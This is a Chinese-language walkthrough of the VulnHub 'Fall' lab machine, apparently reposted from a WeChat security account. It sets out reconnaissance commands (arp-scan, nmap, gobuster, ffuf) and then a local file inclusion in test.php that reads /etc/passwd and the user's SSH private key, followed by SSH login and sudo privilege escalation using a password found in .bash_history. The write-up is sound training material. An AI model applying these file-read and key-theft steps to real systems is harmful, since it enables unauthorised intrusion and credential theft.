虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/
虚拟机简介:作者最喜欢的季节,因为它是收获的季节
目标:1个flag
级别:中级
1、信息收集
1.1 通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.131
查看开放22、80、111、139、443等多个端口
2、渗透测试
2.1 站点渗透
1.访问WEB站点
发现存在一个账号qiu
2.查看CMS版本
查看CMS为 CMS Made Simple ,版本为2.2.15
搜索漏洞,发现XSS和文件上传,需要认证成功后才能执行
3.使用gobuster进行爆破
gobuster dir -u http://192.168.207.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
4.测试访问test.php
提示需要在get请求中传入参数
测试需要传参的内容,获取到参数为file
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.207.131/test.php?FUZZ=/etc/passwd' -fs 80
5.通过file参数获取密码
curl http://192.168.207.131/test.php?file=/etc/passwd
查看存在qiu账号,并且允许登录
6.获取qiu账号的登录密钥
curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa
7.保存密钥文件并修改权限
curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa >> id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
3.提权
1.本地提权
1.查看历史命令
以前执行过sudo命令,密码为:remarkablyawesomE
cat .bash_history
2.查看sudo权限
该用户拥有所有的sudo权限
sudo -l
3.执行sudo提权
sudo su
4.查看flag
cd /root
cat proof.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之FALL
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论